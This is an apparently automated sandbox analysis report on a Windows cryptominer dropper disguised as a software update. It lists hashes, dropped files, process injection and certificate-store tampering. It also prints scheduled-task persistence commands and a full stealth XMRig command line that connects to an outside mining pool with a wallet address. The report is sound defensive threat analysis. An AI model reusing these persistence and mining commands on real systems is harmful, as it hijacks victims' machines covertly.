Analysis
-
max time kernel
150s -
max time network
116s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
19-07-2021 00:03
Static task
static1
Behavioral task
behavioral1
Sample
Software updated v2.6.0.exe
Resource
win7v20210410
General
-
Target
Software updated v2.6.0.exe
-
Size
256KB
-
MD5
18d05e20731583a22b495d0d1f107c5b
-
SHA1
2ced0e3577063ca3613b43661e7df5bc1411ab09
-
SHA256
b1c5fd5c0f6a2760eb638414d9bf9b7536b81f45edbd9d509dd085346c67a6ae
-
SHA512
36e73454b0d74088fb39dbec77c45c4106908dc80efc6a0ac8247a538345b4224f3f5e0cf6b39cf8c1687ddcee58ac2e6f24b735c9b9e277c7d064fd82e7a65a
Malware Config
Signatures
-
XMRig Miner Payload 3 IoCs
Processes:
resource yara_rule behavioral1/memory/856-119-0x0000000140000000-0x0000000140758000-memory.dmp xmrig behavioral1/memory/856-120-0x00000001402EB66C-mapping.dmp xmrig behavioral1/memory/856-122-0x0000000140000000-0x0000000140758000-memory.dmp xmrig -
Executes dropped EXE 6 IoCs
Processes:
xmrmine.exeetcmin.exeserverpatch.exertksmbs.exesihost64.exesihost32.exepid process 1812 xmrmine.exe 1296 etcmin.exe 1876 serverpatch.exe 1536 rtksmbs.exe 1712 sihost64.exe 540 sihost32.exe -
Loads dropped DLL 6 IoCs
Processes:
Software updated v2.6.0.exeetcmin.exexmrmine.exeserverpatch.exertksmbs.exepid process 1672 Software updated v2.6.0.exe 1672 Software updated v2.6.0.exe 1296 etcmin.exe 1812 xmrmine.exe 1876 serverpatch.exe 1536 rtksmbs.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Suspicious use of SetThreadContext 1 IoCs
Processes:
serverpatch.exedescription pid process target process PID 1876 set thread context of 856 1876 serverpatch.exe explorer.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 1480 schtasks.exe 932 schtasks.exe 1756 schtasks.exe 1864 schtasks.exe -
Processes:
rtksmbs.exeserverpatch.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 rtksmbs.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 rtksmbs.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 serverpatch.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a serverpatch.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a serverpatch.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25040000000100000010000000d474de575c39b2d39c8583c5c065498a2000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a serverpatch.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
etcmin.exexmrmine.exertksmbs.exeserverpatch.exepid process 1296 etcmin.exe 1812 xmrmine.exe 1536 rtksmbs.exe 1876 serverpatch.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
etcmin.exexmrmine.exertksmbs.exeserverpatch.exeexplorer.exedescription pid process Token: SeDebugPrivilege 1296 etcmin.exe Token: SeDebugPrivilege 1812 xmrmine.exe Token: SeDebugPrivilege 1536 rtksmbs.exe Token: SeDebugPrivilege 1876 serverpatch.exe Token: SeLockMemoryPrivilege 856 explorer.exe Token: SeLockMemoryPrivilege 856 explorer.exe -
Suspicious use of WriteProcessMemory 60 IoCs
Processes:
Software updated v2.6.0.exeetcmin.exexmrmine.execmd.execmd.exertksmbs.exeserverpatch.execmd.execmd.exedescription pid process target process PID 1672 wrote to memory of 1812 1672 Software updated v2.6.0.exe xmrmine.exe PID 1672 wrote to memory of 1812 1672 Software updated v2.6.0.exe xmrmine.exe PID 1672 wrote to memory of 1812 1672 Software updated v2.6.0.exe xmrmine.exe PID 1672 wrote to memory of 1812 1672 Software updated v2.6.0.exe xmrmine.exe PID 1672 wrote to memory of 1296 1672 Software updated v2.6.0.exe etcmin.exe PID 1672 wrote to memory of 1296 1672 Software updated v2.6.0.exe etcmin.exe PID 1672 wrote to memory of 1296 1672 Software updated v2.6.0.exe etcmin.exe PID 1672 wrote to memory of 1296 1672 Software updated v2.6.0.exe etcmin.exe PID 1296 wrote to memory of 920 1296 etcmin.exe cmd.exe PID 1296 wrote to memory of 920 1296 etcmin.exe cmd.exe PID 1296 wrote to memory of 920 1296 etcmin.exe cmd.exe PID 1812 wrote to memory of 1888 1812 xmrmine.exe cmd.exe PID 1812 wrote to memory of 1888 1812 xmrmine.exe cmd.exe PID 1812 wrote to memory of 1888 1812 xmrmine.exe cmd.exe PID 920 wrote to memory of 932 920 cmd.exe schtasks.exe PID 920 wrote to memory of 932 920 cmd.exe schtasks.exe PID 920 wrote to memory of 932 920 cmd.exe schtasks.exe PID 1888 wrote to memory of 1480 1888 cmd.exe schtasks.exe PID 1888 wrote to memory of 1480 1888 cmd.exe schtasks.exe PID 1888 wrote to memory of 1480 1888 cmd.exe schtasks.exe PID 1812 wrote to memory of 1876 1812 xmrmine.exe serverpatch.exe PID 1812 wrote to memory of 1876 1812 xmrmine.exe serverpatch.exe PID 1812 wrote to memory of 1876 1812 xmrmine.exe serverpatch.exe PID 1296 wrote to memory of 1536 1296 etcmin.exe rtksmbs.exe PID 1296 wrote to memory of 1536 1296 etcmin.exe rtksmbs.exe PID 1296 wrote to memory of 1536 1296 etcmin.exe rtksmbs.exe PID 1536 wrote to memory of 1152 1536 rtksmbs.exe cmd.exe PID 1536 wrote to memory of 1152 1536 rtksmbs.exe cmd.exe PID 1536 wrote to memory of 1152 1536 rtksmbs.exe cmd.exe PID 1876 wrote to memory of 1980 1876 serverpatch.exe cmd.exe PID 1876 wrote to memory of 1980 1876 serverpatch.exe cmd.exe PID 1876 wrote to memory of 1980 1876 serverpatch.exe cmd.exe PID 1152 wrote to memory of 1864 1152 cmd.exe schtasks.exe PID 1152 wrote to memory of 1864 1152 cmd.exe schtasks.exe PID 1152 wrote to memory of 1864 1152 cmd.exe schtasks.exe PID 1980 wrote to memory of 1756 1980 cmd.exe schtasks.exe PID 1980 wrote to memory of 1756 1980 cmd.exe schtasks.exe PID 1980 wrote to memory of 1756 1980 cmd.exe schtasks.exe PID 1876 wrote to memory of 1712 1876 serverpatch.exe sihost64.exe PID 1876 wrote to memory of 1712 1876 serverpatch.exe sihost64.exe PID 1876 wrote to memory of 1712 1876 serverpatch.exe sihost64.exe PID 1536 wrote to memory of 540 1536 rtksmbs.exe sihost32.exe PID 1536 wrote to memory of 540 1536 rtksmbs.exe sihost32.exe PID 1536 wrote to memory of 540 1536 rtksmbs.exe sihost32.exe PID 1876 wrote to memory of 856 1876 serverpatch.exe explorer.exe PID 1876 wrote to memory of 856 1876 serverpatch.exe explorer.exe PID 1876 wrote to memory of 856 1876 serverpatch.exe explorer.exe PID 1876 wrote to memory of 856 1876 serverpatch.exe explorer.exe PID 1876 wrote to memory of 856 1876 serverpatch.exe explorer.exe PID 1876 wrote to memory of 856 1876 serverpatch.exe explorer.exe PID 1876 wrote to memory of 856 1876 serverpatch.exe explorer.exe PID 1876 wrote to memory of 856 1876 serverpatch.exe explorer.exe PID 1876 wrote to memory of 856 1876 serverpatch.exe explorer.exe PID 1876 wrote to memory of 856 1876 serverpatch.exe explorer.exe PID 1876 wrote to memory of 856 1876 serverpatch.exe explorer.exe PID 1876 wrote to memory of 856 1876 serverpatch.exe explorer.exe PID 1876 wrote to memory of 856 1876 serverpatch.exe explorer.exe PID 1876 wrote to memory of 856 1876 serverpatch.exe explorer.exe PID 1876 wrote to memory of 856 1876 serverpatch.exe explorer.exe PID 1876 wrote to memory of 856 1876 serverpatch.exe explorer.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Software updated v2.6.0.exe"C:\Users\Admin\AppData\Local\Temp\Software updated v2.6.0.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\xmrmine.exeC:\Users\Admin\AppData\Roaming\xmrmine.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"' & exit3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"'4⤵
- Creates scheduled task(s)
-
C:\Users\Admin\appdata\roaming\serverpatch.exe"C:\Users\Admin\appdata\roaming\serverpatch.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"' & exit4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"'5⤵
- Creates scheduled task(s)
-
C:\Users\Admin\appdata\roaming\microsoft\libs\sihost64.exe"C:\Users\Admin\appdata\roaming\microsoft\libs\sihost64.exe"4⤵
- Executes dropped EXE
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=459jfEXyVheN7bBBRJPjJY7jH8nCKFZKdZrBcyPK6q4b7mQnrxN3sSmU8wAcuVvMxP6sumE9x28XSRCgLgyBvT4VENVJbTQ --pass= --cpu-max-threads-hint=40 --cinit-idle-wait=2 --cinit-idle-cpu=80 --cinit-stealth4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\etcmin.exeC:\Users\Admin\AppData\Roaming\etcmin.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"' & exit3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"'4⤵
- Creates scheduled task(s)
-
C:\Users\Admin\appdata\roaming\rtksmbs.exe"C:\Users\Admin\appdata\roaming\rtksmbs.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"' & exit4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"'5⤵
- Creates scheduled task(s)
-
C:\Users\Admin\appdata\roaming\microsoft\telemetry\sihost32.exe"C:\Users\Admin\appdata\roaming\microsoft\telemetry\sihost32.exe"4⤵
- Executes dropped EXE
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015MD5
2902de11e30dcc620b184e3bb0f0c1cb
SHA15d11d14a2558801a2688dc2d6dfad39ac294f222
SHA256e6a7f1f8810e46a736e80ee5ac6187690f28f4d5d35d130d410e20084b2c1544
SHA512efd415cde25b827ac2a7ca4d6486ce3a43cdcc1c31d3a94fd7944681aa3e83a4966625bf2e6770581c4b59d05e35ff9318d9adaddade9070f131076892af2fa0
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\FB5E2F83CE9B8330B0590B7CD2E5FF2EMD5
d474de575c39b2d39c8583c5c065498a
SHA15fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25
SHA2567431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf
SHA5127b9cf079b9769dfa9eb2e28cf5a4da9922b0f80e415097d326bf20547505a6ab1b7ac6a83846d0b8253e9168b1f915b8974aec844a9b31c3adcab3aec89fcd07
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015MD5
f3c6c3bbbfd1a9ecc7b8b39244914347
SHA1bdd6d74b592ad8e93a7189d4a6abb4815bb5cd3f
SHA256653d9ce52affe145ce930b52bbfceb138cb0f689ce28017842af3355b50d544d
SHA51256cd7b0d3282e3d58b8b6c8170ecf31812f89c873c0048ce7479ed63a6da7d723de09c91c44ad0c7e3381abe3e246de96fe159f52f5808f686224f327e54c96a
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB5E2F83CE9B8330B0590B7CD2E5FF2EMD5
c02d5bb6ca1f2bfcedfcc810ab6c0d70
SHA13f84e98b1acb842295b373de45b542b63cdce65b
SHA2562919035d4e34a77b344953d111425dd1d92b111d57c10c77b0d82a4b732f10d6
SHA512202b0d44d64b9346dfa4539fdfc8b2d227263e1cf36f82e785bcc035f4c9a74d19792d6dc40bec01f16a5035be60957f07c6de0cdd11006d3bf09262b543919d
-
C:\Users\Admin\AppData\Roaming\Microsoft\libs\sihost64.exeMD5
f20a5085dbb85927b25ed46a45fe0a13
SHA141b351e45a7be1d6c6c6918ee65b00f5d69ff787
SHA256370f698a696bd33c167348773c954d3b079ee719d91f7fa10c47e96bd647a235
SHA5124cba09f695db44f05c46511f4ca5a6d2d670f83b93793cfeb09e4112986eff44787061832993aa2dc69ef967327e63a09d4675a1e3dd1433f9ad30391158bc3f
-
C:\Users\Admin\AppData\Roaming\Microsoft\telemetry\sihost32.exeMD5
e149663730c0b03c8936baffe9645bb4
SHA1c0fb146c35d48481df4149027953e4ab7be59e95
SHA25633225a857521c55b3456fa11dad3568911c30bc74d408eba8b3f61a2b4118469
SHA512553078b3bb9bab56d3f4df890f798118d4a3ec0d83550c1d9ac20df02ab4a4672fc0cc8ec170de56336679a81f7a0809c1a2de5cedfcddf916ed5768f2275abe
-
C:\Users\Admin\AppData\Roaming\etcmin.exeMD5
406f2550d0d4b9b3e2f47994076e8b8b
SHA101ab414c9d14ef6a10cd1f3c815e2d63ace18822
SHA2564805d0ba5ffb8546fa50acc17332b9582df9b5a067db9ac867723f4db0de4ae0
SHA51273b20eb53172950295b6d3756482cdadb26ec5d0f497e0bc325986f53469f8022405b8789ff7f7624f71a72b20de82571bd45944eb4ab5a34912578d7f05e1d4
-
C:\Users\Admin\AppData\Roaming\etcmin.exeMD5
406f2550d0d4b9b3e2f47994076e8b8b
SHA101ab414c9d14ef6a10cd1f3c815e2d63ace18822
SHA2564805d0ba5ffb8546fa50acc17332b9582df9b5a067db9ac867723f4db0de4ae0
SHA51273b20eb53172950295b6d3756482cdadb26ec5d0f497e0bc325986f53469f8022405b8789ff7f7624f71a72b20de82571bd45944eb4ab5a34912578d7f05e1d4
-
C:\Users\Admin\AppData\Roaming\rtksmbs.exeMD5
406f2550d0d4b9b3e2f47994076e8b8b
SHA101ab414c9d14ef6a10cd1f3c815e2d63ace18822
SHA2564805d0ba5ffb8546fa50acc17332b9582df9b5a067db9ac867723f4db0de4ae0
SHA51273b20eb53172950295b6d3756482cdadb26ec5d0f497e0bc325986f53469f8022405b8789ff7f7624f71a72b20de82571bd45944eb4ab5a34912578d7f05e1d4
-
C:\Users\Admin\AppData\Roaming\serverpatch.exeMD5
973037113a1f50e0ca79d3cc42a5ef66
SHA178235c164ebfa47d613a100abf5c64bed10c1036
SHA256a5decfb1b6c768e361391a8434746026e811683c64ac2c399765999fab1c936c
SHA512d9c41cf4606e971bab34fb0153320111ddd4c92f7b2d729aff583a378045dcd1566b83b2724b65a11ae6c5a5cb4ad35d815eea1e3ce14ef2ce7250b0bf90aa32
-
C:\Users\Admin\AppData\Roaming\xmrmine.exeMD5
973037113a1f50e0ca79d3cc42a5ef66
SHA178235c164ebfa47d613a100abf5c64bed10c1036
SHA256a5decfb1b6c768e361391a8434746026e811683c64ac2c399765999fab1c936c
SHA512d9c41cf4606e971bab34fb0153320111ddd4c92f7b2d729aff583a378045dcd1566b83b2724b65a11ae6c5a5cb4ad35d815eea1e3ce14ef2ce7250b0bf90aa32
-
C:\Users\Admin\AppData\Roaming\xmrmine.exeMD5
973037113a1f50e0ca79d3cc42a5ef66
SHA178235c164ebfa47d613a100abf5c64bed10c1036
SHA256a5decfb1b6c768e361391a8434746026e811683c64ac2c399765999fab1c936c
SHA512d9c41cf4606e971bab34fb0153320111ddd4c92f7b2d729aff583a378045dcd1566b83b2724b65a11ae6c5a5cb4ad35d815eea1e3ce14ef2ce7250b0bf90aa32
-
C:\Users\Admin\appdata\roaming\microsoft\libs\sihost64.exeMD5
f20a5085dbb85927b25ed46a45fe0a13
SHA141b351e45a7be1d6c6c6918ee65b00f5d69ff787
SHA256370f698a696bd33c167348773c954d3b079ee719d91f7fa10c47e96bd647a235
SHA5124cba09f695db44f05c46511f4ca5a6d2d670f83b93793cfeb09e4112986eff44787061832993aa2dc69ef967327e63a09d4675a1e3dd1433f9ad30391158bc3f
-
C:\Users\Admin\appdata\roaming\microsoft\telemetry\sihost32.exeMD5
e149663730c0b03c8936baffe9645bb4
SHA1c0fb146c35d48481df4149027953e4ab7be59e95
SHA25633225a857521c55b3456fa11dad3568911c30bc74d408eba8b3f61a2b4118469
SHA512553078b3bb9bab56d3f4df890f798118d4a3ec0d83550c1d9ac20df02ab4a4672fc0cc8ec170de56336679a81f7a0809c1a2de5cedfcddf916ed5768f2275abe
-
C:\Users\Admin\appdata\roaming\rtksmbs.exeMD5
406f2550d0d4b9b3e2f47994076e8b8b
SHA101ab414c9d14ef6a10cd1f3c815e2d63ace18822
